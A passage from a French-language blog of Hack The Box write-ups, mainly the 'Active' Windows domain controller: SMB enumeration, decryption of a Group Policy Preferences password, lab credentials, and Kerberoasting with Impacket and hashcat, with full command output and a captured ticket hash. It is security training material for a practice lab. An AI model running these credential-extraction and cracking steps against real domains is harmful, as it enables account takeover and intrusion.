</span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;type root.txt </span></span><span class="line"><span class="cl"><span class="nb">type</span> root.txt </span></span><span class="line"><span class="cl">39c4....c39f </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;powershell </span></span><span class="line"><span class="cl">powershell </span></span><span class="line"><span class="cl">Windows PowerShell </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">buff<span class="se">\a</span>dministrator </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/active-htb/Sun, 05 Jan 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/active-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Active cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Active</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.100</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">SVC_TGS : GPPstillStandingStrong2k18 </span></span><span class="line"><span class="cl">Administrator : Ticketmaster1968 </span></span></code></pre></td></tr></table> </div> </div><h2 id="version">Version </h2><p><code>Windows Server 2008 R2 SP1</code></p> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap -sC -sV -An -p- 10.10.10.100 </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-12-12 17:12 EST </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.10.100 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.027s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Not shown: <span class="m">65512</span> closed tcp ports <span class="o">(</span>reset<span class="o">)</span> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">53/tcp open domain Microsoft DNS 6.1.7601 <span class="o">(</span>1DB15D39<span class="o">)</span> <span class="o">(</span>Windows Server <span class="m">2008</span> R2 SP1<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> dns-nsid: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ bind.version: Microsoft DNS 6.1.7601 <span class="o">(</span>1DB15D39<span class="o">)</span> </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos <span class="o">(</span>server time: 2024-12-12 22:12:47Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: active.htb, Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? </span></span><span class="line"><span class="cl">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open tcpwrapped </span></span><span class="line"><span class="cl">3268/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: active.htb, Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">3269/tcp open tcpwrapped </span></span><span class="line"><span class="cl">5722/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf .NET Message Framing </span></span><span class="line"><span class="cl">47001/tcp open http Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">49152/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49153/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49154/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49155/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49158/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49165/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49166/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49168/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 2:1:0: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled and required </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2024-12-12T22:13:57 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: 2024-12-12T22:09:06 </span></span></code></pre></td></tr></table> </div> </div><h3 id="enu4mlinux">enu4mlinux </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Got OS info <span class="k">for</span> 10.10.10.100 from srvinfo: </span></span><span class="line"><span class="cl"> 10.10.10.100 Wk Sv PDC Tim NT Domain Controller </span></span><span class="line"><span class="cl"> platform_id : <span class="m">500</span> </span></span><span class="line"><span class="cl"> os version : 6.1 </span></span><span class="line"><span class="cl"> server <span class="nb">type</span> : <span class="nv">0x80102b</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">=================================(</span> Share Enumeration on 10.10.10.100 <span class="o">)=================================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">do_connect: Connection to 10.10.10.100 failed <span class="o">(</span>Error NT_STATUS_RESOURCE_NAME_NOT_FOUND<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Sharename Type Comment </span></span><span class="line"><span class="cl"> --------- ---- ------- </span></span><span class="line"><span class="cl"> ADMIN$ Disk Remote Admin </span></span><span class="line"><span class="cl"> C$ Disk Default share </span></span><span class="line"><span class="cl"> IPC$ IPC Remote IPC </span></span><span class="line"><span class="cl"> NETLOGON Disk Logon server share </span></span><span class="line"><span class="cl"> Replication Disk </span></span><span class="line"><span class="cl"> SYSVOL Disk Logon server share </span></span><span class="line"><span class="cl"> Users Disk </span></span><span class="line"><span class="cl">Reconnecting with SMB1 <span class="k">for</span> workgroup listing. </span></span><span class="line"><span class="cl">Unable to connect with SMB1 -- no workgroup available </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Attempting to map shares on 10.10.10.100 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">//10.10.10.100/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.100/C$ Mapping: DENIED Listing: N/A Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.100/IPC$ Mapping: OK Listing: DENIED Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.100/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.100/Replication Mapping: OK Listing: OK Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.100/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.100/Users Mapping: DENIED Listing: N/A Writing: N/A </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="smb-share-replication">SMB Share &ldquo;Replication&rdquo; </h3><p>En fouillant le SMB share &ldquo;replication&rdquo; accessible avec un utilisateur anonyme, on trouve un fichier intéressant parmis les autres:</p> <ul> <li>Groups.xml</li> </ul> <p>Il semble contenir un mot de passe chiffré.</p> <p><strong>Explication de ChatGPT</strong> :</p> <p>Le mot de passe chiffré dans le champ cpassword que vous montrez est très probablement encodé en AES-256-CBC et fait partie d&rsquo;une configuration XML de stratégie de groupe Windows (Group Policy Preferences, ou GPP). Ces cpassword sont généralement liés à des configurations de comptes d&rsquo;utilisateurs déployés via les GPP.</p> <h3 id="gpp-exploitation">GPP Exploitation </h3><p>On déchiffre le mot de passe, ce qui nous donne : <code>GPPstillStandingStrong2k18</code> Le username associé est également donné dans le xml : <code>SVC_TGS</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbclient --no-pass //10.10.10.100/Replication </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat Groups.xml </span></span><span class="line"><span class="cl">&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s2">&#34;1.0&#34;</span> <span class="nv">encoding</span><span class="o">=</span><span class="s2">&#34;utf-8&#34;</span>?&gt; </span></span><span class="line"><span class="cl">&lt;Groups <span class="nv">clsid</span><span class="o">=</span><span class="s2">&#34;{3125E937-EB16-4b4c-9934-544FC6D24D26}&#34;</span>&gt;&lt;User <span class="nv">clsid</span><span class="o">=</span><span class="s2">&#34;{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}&#34;</span> <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;active.htb\SVC_TGS&#34;</span> <span class="nv">image</span><span class="o">=</span><span class="s2">&#34;2&#34;</span> <span class="nv">changed</span><span class="o">=</span><span class="s2">&#34;2018-07-18 20:46:06&#34;</span> <span class="nv">uid</span><span class="o">=</span><span class="s2">&#34;{EF57DA28-5F69-4530-A59E-AAB58578219D}&#34;</span>&gt;&lt;Properties <span class="nv">action</span><span class="o">=</span><span class="s2">&#34;U&#34;</span> <span class="nv">newName</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">fullName</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">description</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">cpassword</span><span class="o">=</span><span class="s2">&#34;edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ&#34;</span> <span class="nv">changeLogon</span><span class="o">=</span><span class="s2">&#34;0&#34;</span> <span class="nv">noChange</span><span class="o">=</span><span class="s2">&#34;1&#34;</span> <span class="nv">neverExpires</span><span class="o">=</span><span class="s2">&#34;1&#34;</span> <span class="nv">acctDisabled</span><span class="o">=</span><span class="s2">&#34;0&#34;</span> <span class="nv">userName</span><span class="o">=</span><span class="s2">&#34;active.htb\SVC_TGS&#34;</span>/&gt;&lt;/User&gt; </span></span><span class="line"><span class="cl">&lt;/Groups&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ gpp-decrypt <span class="s2">&#34;edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ&#34;</span> </span></span><span class="line"><span class="cl">GPPstillStandingStrong2k18 </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-flag---smb-share-users">user flag - SMB Share Users </h3><p>En scannat a nouveau les shares SMB, cette fois-ci avec notre user/password obtenu, on voit qu&rsquo;on a acces au share &ldquo;Users&rdquo; en readonly. On y trouve un dossier avec le nom de notre utilisateur et tous ces fichiers Windows, avec le flag user.txt :</p> <blockquote> <p>1fc4&hellip;..a676</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Active/bloodhound1<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ smbclient //10.10.10.100/Users -U <span class="s1">&#39;SVC_TGS%GPPstillStandingStrong2k18&#39;</span> </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . DR <span class="m">0</span> Sat Jul <span class="m">21</span> 10:39:20 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> .. DR <span class="m">0</span> Sat Jul <span class="m">21</span> 10:39:20 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Administrator D <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:21 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> All Users DHSrn <span class="m">0</span> Tue Jul <span class="m">14</span> 01:06:44 <span class="m">2009</span> </span></span><span class="line"><span class="cl"> Default DHR <span class="m">0</span> Tue Jul <span class="m">14</span> 02:38:21 <span class="m">2009</span> </span></span><span class="line"><span class="cl"> Default User DHSrn <span class="m">0</span> Tue Jul <span class="m">14</span> 01:06:44 <span class="m">2009</span> </span></span><span class="line"><span class="cl"> desktop.ini AHS <span class="m">174</span> Tue Jul <span class="m">14</span> 00:57:55 <span class="m">2009</span> </span></span><span class="line"><span class="cl"> Public DR <span class="m">0</span> Tue Jul <span class="m">14</span> 00:57:55 <span class="m">2009</span> </span></span><span class="line"><span class="cl"> SVC_TGS D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:16:32 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">5217023</span> blocks of size 4096. <span class="m">278586</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> <span class="nb">cd</span> SVC_TGS<span class="se">\ </span></span></span><span class="line"><span class="cl">smb: <span class="se">\S</span>VC_TGS<span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:16:32 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:16:32 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Contacts D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:14:11 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Desktop D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:14:42 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Downloads D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:14:23 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Favorites D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:14:44 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Links D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:14:57 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> My Documents D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:15:03 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> My Music D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:15:32 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> My Pictures D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:15:43 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> My Videos D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:15:53 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Saved Games D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:16:12 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Searches D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:16:24 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">5217023</span> blocks of size 4096. <span class="m">278586</span> blocks available </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Active/bloodhound1<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ sudo mount -t cifs -o <span class="nv">username</span><span class="o">=</span><span class="s1">&#39;SVC_TGS&#39;</span>,password<span class="o">=</span><span class="s1">&#39;GPPstillStandingStrong2k18&#39;</span> //10.10.10.100/Users/SVC_TGS /mnt/smb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Active/bloodhound1<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ xdg-open /mnt/smb </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="kerberoasting-attack-on-spn-cifs">Kerberoasting Attack on SPN &lsquo;CIFS&rsquo; </h3><p>Cette commande exécute l&rsquo;outil <code>GetUserSPNs.py</code> de la suite Impacket pour récupérer les <strong>Service Principal Names</strong> (SPN) configurés dans l&rsquo;Active Directory, liés à des comptes de service. Ici, nous vérifions s&rsquo;il existe un SPN qui pourrait être exploité pour effectuer une attaque de <strong>Kerberoasting</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ impacket-GetUserSPNs active.htb/SVC_TGS:<span class="s2">&#34;GPPstillStandingStrong2k18&#34;</span> -dc-ip 10.10.10.100 </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation </span></span><span class="line"><span class="cl">-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- </span></span><span class="line"><span class="cl">active/CIFS:445 Administrator <span class="nv">CN</span><span class="o">=</span>Group Policy Creator Owners,CN<span class="o">=</span>Users,DC<span class="o">=</span>active,DC<span class="o">=</span>htb 2018-07-18 15:06:40.351723 2025-01-04 07:30:15.825757 </span></span></code></pre></td></tr></table> </div> </div><p>L&rsquo;option -request permet de demander un <strong>ticket TGS</strong> (Ticket Granting Service) pour les <strong>SPN</strong> trouvés. Ce ticket est ensuite extrait sous forme de hash Kerberos, qui pourra être craqué hors ligne.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ impacket-GetUserSPNs active.htb/SVC_TGS:<span class="s2">&#34;GPPstillStandingStrong2k18&#34;</span> -request -dc-ip 10.10.10.100 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation </span></span><span class="line"><span class="cl">-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- </span></span><span class="line"><span class="cl">active/CIFS:445 Administrator <span class="nv">CN</span><span class="o">=</span>Group Policy Creator Owners,CN<span class="o">=</span>Users,DC<span class="o">=</span>active,DC<span class="o">=</span>htb 2018-07-18 15:06:40.351723 2025-01-04 07:30:15.825757 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> CCache file is not found. Skipping... </span></span><span class="line"><span class="cl"><span class="nv">$krb5tgs$23$*</span>Administrator<span class="nv">$ACTIVE</span>.HTB<span class="nv">$active</span>.htb/Administrator*<span class="nv">$8852493078</span>c2a4f352f6468b34dcd243<span class="nv">$38</span>b8aa13f6ffb46cd7866c10ab7d0dc3a54117cfe4cd271fba599fa52f84b826cb94edda0fada6c386721fa3edfc10cf58b23c35cfdbd409e42d9ba81b84cab539fb285d561f7a8c15f3ee813eede43d56618635868377a8b9fe39c0708da79aebe14351a3bcf89b1d6f248a545a042772b27bd528c91df09e5b900df3b5188cd734316acd1416c63bf032540166f0e319db943dc7a099234da10956156f753927dafbb8f1c244df2b4a3c349f333a1cb6d26ae607a037b9a39a0f995f8ba811d7b8dfc58100c6b88b8493c1d85dee40d784f275c24184e727c3e55baa2fa233a28a820e5d04684b320b925588f9eb37568891bef410775ec5c001c0dbbe9b8b1acce9b7b55aa54b37367fabede080a6a270e5a79b49ff27f83f90da85a6bbe4a99210d6fb4a9d01faee68080243f6bc04131beb8111fceeedc87bbdd9168d95d3e15e262ed2a7a0bbda46c0a51bdbb32fc98bd81252f31f928e317b06a768ed51e75e58dc66b430f9638d2996944b324ea624be7fc9a24ff5b2cd4ab9ae0b156fc9747c8c7482b785815c46293b772f1d920c776b2a6aa2ab1bf815543ba5070381cd55f21b4c9b9a70172c3e637dad6e91c1e03651de9f8532e537119b2062f63c92a771ba8fe33b3ca7a674a204331d3f577bff722492b960c241a84c59f63b28b7eeba74c37db41f4d91215e3421d820b39b4a1dfd9477b885385c8bf578718ef8f8ca659818795dd182bc91f7e13afae7cf4e38cf9bb5f4e6530ec9ae3272873e706dd528e52bbedfd39de18621c71eed9556eaec0d53b7655a4b8ec5ee1e54b408f7416197e66ea5650b317deb4b50dda2d1164ce4e51d802e099dbed074edb67b9fa2cf90ae3535fbfad2be12fe224132132040e1e842355ad2783c07c376e2f97017cc84d266bb8127681edfdaae6fa0de25a3092fecb65860d22279a50db9c0f339f5ea4b21fa96007757b9099aca27c87e34403149179c77dcbe5e546db3960f768a2cccbff8fdb869b61c312357186bc803e56b76a503d9716549e53ada50aeb8eaf0018bed0449a63d4a69fb985eacb782f48e5f6c18603ce64ad7f5acc2046798a13de5c8da29e9ec5b763c63d19fdb9fc9d41fd6f704098ff0fda0220ea2ba32ada95eba169827ef9ad50c77475ef5dc45cc56063c28462a1a81786271ed6ae8505d3aca6b81aa9c1e9964a3dec3277a526a239241251a3c05bcbab5b30e596e23c189bcc442170b3b09a3e9f8b2e5d00cae47 </span></span></code></pre></td></tr></table> </div> </div><p>Ce résultat correspond au hash TGS récupéré pour le compte Administrator.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">» vim admin_hash.txt </span></span><span class="line"><span class="cl">» hashcat -m <span class="m">13100</span> -a <span class="m">0</span> admin_hash.txt ~/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">hashcat <span class="o">(</span>v6.2.5<span class="o">)</span> starting </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dictionary cache hit: </span></span><span class="line"><span class="cl">* Filename..: /home/leopold/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">* Passwords.: <span class="m">14344385</span> </span></span><span class="line"><span class="cl">* Bytes.....: <span class="m">139922195</span> </span></span><span class="line"><span class="cl">* Keyspace..: <span class="m">14344385</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$krb5tgs$23$*</span>Administrator<span class="nv">$ACTIVE</span>.HTB<span class="nv">$active</span>.htb/Administrator*<span class="nv">$8852493078</span>c2a4f352f6468b34dcd243<span 